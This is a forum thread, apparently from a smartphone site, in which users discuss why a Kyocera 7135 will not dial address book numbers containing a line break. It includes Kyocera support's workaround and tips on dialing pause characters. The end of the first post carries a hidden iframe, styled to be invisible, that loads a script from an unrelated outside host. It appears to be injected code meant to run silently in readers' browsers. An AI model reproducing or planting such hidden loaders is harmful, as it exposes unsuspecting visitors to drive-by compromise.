+ Reply to Thread
Results 1 to 10 of 10
  1. #1
    Registered User
    Join Date
    01-16-2003
    Posts
    13

    Address Book Phone Dial Issue

    Did a search and didn't see a discussion of this problem already. When I have a phone entry that has multiple lines for one phone number, tapping on the number will not launch the phone dialer. My 6035 used to work just fine with this but my 7135 doesn't.

    I have around 400 phone entries where this exists. I work for a company that has a nationwide internal phone system that dials office to office with just 7-digits (we call it a TieLine). For all my internal names and addresses I put phone entries in the "Work" entry as follows:

    615-555-1212
    T/L 555-1212

    In addition to the above, I also have some entries with extensions as follows:

    615-555-1212
    x123

    In both cases there is a "new line" character between the first number and the second number. In the first case, I only have the second number to facilitate lookup for internal calls (I don't actually use it with my cell phone). On the 6035, I could tap on the "Work" entry and it dialed it just fine... up to the "new line" character. On my new 7135, it won't even launch the phone dialer when I tap on this phone entry. If I tap on a phone entry that doesn't have a "new line" character everything works fine.

    Can somebody else verify that their phone works the same way? I don't understand why the phone should not be able to dial these numbers.

    I really don't want to rework over 400 phone entries. Especially since there is not another phone field I can use in many cases... becuase I also have fax, mobile, pager, and email on many of the entries.<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>
    Regards, Steve

  2. #2
    Registered User
    Join Date
    03-22-2002
    Posts
    1,495
    Mine does the same. It looks like you will need to bring them to the same line. I think the easiest way to fix this will be to export your phone list to a spreadsheet or the like, and do a "replace" finction to replace the carriage return with a space or pause, whatever you need, then import them back.

  3. #3
    Registered User
    Join Date
    10-22-2002
    Posts
    120
    Try this thread
    http://www.smartphonesource.com/vbul...ist+phone+four

    Apparently there is a glitch. I believe they found the exact problem in this thread, but not a great work around. Deleting the company name and title will apparently allow you to dial any of the numbers. According to the thread Kyocera is aware of and working on this problem.
    If at first you don't succeed, don't try sky diving.

  4. #4
    Registered User
    Join Date
    01-16-2003
    Posts
    13
    Steve B.

    The problem described in the post you referenced is not the problem I am experiencing. It has nothing to do with how many phone entries I have. It has to do with having a "new line" characterd in the phone number field... such as separating an information only entry from the actual phone number (like an extension).

    I don't seem to have the problem described in the post you referenced. Perhaps they have corrected that problem in the latest releases of the firmware/software.

    Regards, Steve Yarbrough
    Regards, Steve

  5. #5
    Registered User
    Join Date
    04-24-2003
    Posts
    2
    Steve,

    I can second your issue. If I insert a newline in a phone number it will not allow me to dial that number. (Hitting 'Send' does nothing.)

    If I delete the newline, I simply select the number and hit 'Send'.

    Unfortunately I don't have a solution to offer.

    Sorry. :dunno


    FWIW. I just took delivery of my 7135 via Verizon late last week in ATL so I assume it's a late-model 'official' release.


    -j

  6. #6
    Registered User
    Join Date
    01-16-2003
    Posts
    13
    I received an official reply from Kyocera today... It's not the answer I was hoping for but it is pretty much what I was expecting. Looks like I will be updating over 600 address entries.

    **********Kyocera Reply Follows**********

    Thank you for contacting Kyocera Wireless with the updated informationabout your issue.

    Due to changes made when Palm rewrote OS 3x (the 6035) to become OS 4.1 (the 7135), two line Address Book entries are no longer valid. You will need to remove the extra carriage return and replace it with a space or other character that is a valid phone number entry.

    If you are currently syncing with the Palm Desktop, you can export your Address Book as a CSV (Comma Separated Value) file and then use Microsoft Excel open it and use its find and replace function to remove the carriage return. After that, you can delete the current Address Book entries and import the edited CSV file.

    If your issue is still unresolved, do not hesitate to contact us again. Please refer to case number: 33213 when responding.

    You can also contact Technical Support by calling
    Toll-Free Phone: 1-888-236-2746 (Option 4)

    For any future issues, please visit: http://support.kyocera-wireless.com/ to get instant graphical answers to your questions.


    Kind Regards,
    Debbie
    Kyocera Technical Support
    Support@Kyocera-wireless.com
    Case number: 33213
    Regards, Steve

  7. #7
    Registered User
    Join Date
    03-27-2003
    Location
    San Antonio
    Posts
    56
    In addition to the above, I also have some entries with extensions as follows:

    615-555-1212
    x123
    Regarding the numbers w/extensions, if this is a system where after the initial number is connected you can enter the extension, you could put a # (pause) in place of the X, on the same line, and press the OK button to dial the extension after the other party answers.
    Oxo

  8. #8
    Registered User KLiuLess's Avatar
    Join Date
    11-15-2001
    Posts
    847
    The pause is percent (%), not pound (#). I think a pound will actually send a pound :smash key press tone.

  9. #9
    Registered User
    Join Date
    03-27-2003
    Location
    San Antonio
    Posts
    56
    Maybe I'm calling it the wrong thing. % will pause for a few seconds; # will pause until you hit OK.
    (Minutes later Oops. Never mind. You're exactly right. # transmits a # tone. % pauses until OK is pressed.
    Oxo

  10. #10
    Registered User
    Join Date
    02-20-2003
    Location
    VT
    Posts
    264
    Originally posted by Oxojim
    % pauses until OK is pressed.
    And , is the one that will pause for a second and then continue.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts